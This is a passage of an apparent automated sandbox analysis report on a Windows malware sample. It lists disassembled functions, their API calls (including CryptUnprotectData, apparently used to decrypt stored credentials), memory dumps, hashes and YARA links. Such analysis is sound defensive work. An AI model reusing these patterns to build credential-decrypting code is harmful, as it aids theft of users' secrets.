                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                      • String ID:
                                      • API String ID: 3317088062-0
                                      • Opcode ID: 3f189fe18e517f14be62744156464afc1b6940e57402e70bb660cced377fe0d4
                                      • Instruction ID: c0a84ec33e0cf7c5d5acf117cfefb83dba89e5cfb59c13652f2dc6f2b64bf5bb
                                      • Opcode Fuzzy Hash: 3f189fe18e517f14be62744156464afc1b6940e57402e70bb660cced377fe0d4
                                      • Instruction Fuzzy Hash: E711CEB1E09218EBEB20DB64DC45FA9B778FB40711F000399F609973C0C7742A408B60
                                      Function 00A43970 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoCreateInstance.COMBASE(00A4E120,00000000,00000001,00A4E110,00000000), ref: 00A439A8
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00A43A00
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharCreateInstanceMultiWide
                                      • String ID:
                                      • API String ID: 123533781-0
                                      • Opcode ID: 1ca64e3391cfae1355e1e2fe621329086c4ff311cc80b0ba69b97e170a98fc4d
                                      • Instruction ID: 77a2bc727c4480894461fcfef87972edb5d8c46499bafb0e0c737b8583b23ca3
                                      • Opcode Fuzzy Hash: 1ca64e3391cfae1355e1e2fe621329086c4ff311cc80b0ba69b97e170a98fc4d
                                      • Instruction Fuzzy Hash: 5941FB75A40A189FDB24DB58CC95F9BB7B5BB48702F4041D8E608EB2D0D7716E85CF50
                                      Function 00A3A2B0 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00A3A2D4
                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 00A3A2F3
                                      • LocalFree.KERNEL32(?), ref: 00A3A323
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Local$AllocCryptDataFreeUnprotect
                                      • String ID:
                                      • API String ID: 2068576380-0
                                      • Opcode ID: 8505c19b7c834159877c63a9c461d6e6cb9a8218c7247643b00ef53ac000c0fd
                                      • Instruction ID: 8863aeb00ea62e08dc8505000b514963747f6618e78902f2f76a0bb33cc88fca
                                      • Opcode Fuzzy Hash: 8505c19b7c834159877c63a9c461d6e6cb9a8218c7247643b00ef53ac000c0fd
                                      • Instruction Fuzzy Hash: 3F11A8B8A00209EFCB04DFA4D985AAEB7B5FB89300F104559FD159B350D770AE50CBA1
                                      Function 00AA4BA8 Relevance: 3.4, Strings: 2, Instructions: 941COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: ?$__ZN
                                      • API String ID: 0-1427190319
                                      • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                      • Instruction ID: 26ac70756b7611844763f41f8e5fb977585b27b80543309504b974d51d119354
                                      • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                      • Instruction Fuzzy Hash: CB720272E08B509FD714CF24C89067EB7E2AFDA320F598A1DF8A55B2D1D3709C419B85
                                      Function 00E9B89D Relevance: 2.8, Strings: 1, Instructions: 1578COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: A}
                                      • API String ID: 0-1240962006
                                      • Opcode ID: 2b5905b6748ed5dbd45a2d5499ac63f74f67f0f3adcb89961dc43e86f78387da
                                      • Instruction ID: 8dd367f7193c8b9d865d74fe0f77694276cd3c7358d32e25f596ee651cb53ff7
                                      • Opcode Fuzzy Hash: 2b5905b6748ed5dbd45a2d5499ac63f74f67f0f3adcb89961dc43e86f78387da
                                      • Instruction Fuzzy Hash: 7CB2E7F390C2149FE304AE2DEC8567AFBE9EF94720F1A452DEAC4C3744EA7558018697
                                      Function 00E1383A Relevance: 2.7, Strings: 2, Instructions: 247COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: !k=$R{}
                                      • API String ID: 0-3998711817
                                      • Opcode ID: 7922f2f839e2b0fba69b1ae9be3fa535e30216d33490c38ae16d4581074ae238
                                      • Instruction ID: 75f0d5b32aa41ea2f6ef2db92cb38a82998541cfbc9bccfb404d90c13b9cdd94
                                      • Opcode Fuzzy Hash: 7922f2f839e2b0fba69b1ae9be3fa535e30216d33490c38ae16d4581074ae238
                                      • Instruction Fuzzy Hash: 90715AF3E087046FE3446A2CDD8576AB7D5EB94320F2A863EDE88C3B44F979580142D6
                                      Function 00A85DB9 Relevance: 2.5, Strings: 1, Instructions: 1234COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: xn--
                                      • API String ID: 0-2826155999
                                      • Opcode ID: 2b343989945c8db34948502af16621292e4638c2f2d4a46b7c87ad31944dd077
                                      • Instruction ID: 5dfbbf3b744bdbdc987b3f8f3e0ab5608d5bf523fced1f8001428e0771e20d71
                                      • Opcode Fuzzy Hash: 2b343989945c8db34948502af16621292e4638c2f2d4a46b7c87ad31944dd077
                                      • Instruction Fuzzy Hash: 63A225B1C002688BFF28EB68C8947EDBBB1FF45340F1842AAD5567B281D7359E85CB51
                                      Function 00A84DC8 Relevance: 1.9, APIs: 1, Instructions: 411COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv
                                      • String ID:
                                      • API String ID: 3732870572-0
                                      • Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                      • Instruction ID: acb3aa53fc112478a438de82c53eb6fb775684d38d505aed3c872929d85bbed4
                                      • Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                      • Instruction Fuzzy Hash: 2DE1F431A087419FC725EF28C8807AEB7E2EFC9300F554A2DE9D997291DB319C55CB82
                                      Function 00A84868 Relevance: 1.9, APIs: 1, Instructions: 400COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv
                                      • String ID:
                                      • API String ID: 3732870572-0
                                      • Opcode ID: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                      • Instruction ID: 0554a44efaa0afe67d04eba0c3ed524e271ea0ebc716b6bc31a9aad44c0dd7c5
                                      • Opcode Fuzzy Hash: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                      • Instruction Fuzzy Hash: 1FE1C431A083129FDB24EF18C8817AEB7E6EFC9310F15892DE9999B251D730EC45CB46
                                      Function 00E8D4FA Relevance: 1.8, Strings: 1, Instructions: 520COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: Ya
                                      • API String ID: 0-1372971626
                                      • Opcode ID: 929f2e49d5e92b53f59b01740005dfa526eac6843fdcf80a95e476f0193c9449
                                      • Instruction ID: 223bf12eac5b0d12a02c00b0677f2a10ee93385ff1eca00a181ca2fed1caaa10
                                      • Opcode Fuzzy Hash: 929f2e49d5e92b53f59b01740005dfa526eac6843fdcf80a95e476f0193c9449
                                      • Instruction Fuzzy Hash: 61F129F3A0C3049FE704AE69EC8577ABBD9EF94220F16492DE6C4C7744FA3598018697
                                      Function 00A9E258 Relevance: 1.6, Strings: 1, Instructions: 383COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: UNC\
                                      • API String ID: 0-505053535
                                      • Opcode ID: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                      • Instruction ID: 0f54ba5c8ddd9bbcecf86194c045ac4b2b69114a57b5187a197e265fd2056080
                                      • Opcode Fuzzy Hash: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                      • Instruction Fuzzy Hash: F2E11971F046658EEF10CF19C8843BEBBF2AB85318F198169D4A46F293D7768D46CB90
                                      Function 00E211C5 Relevance: 1.5, Strings: 1, Instructions: 209COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
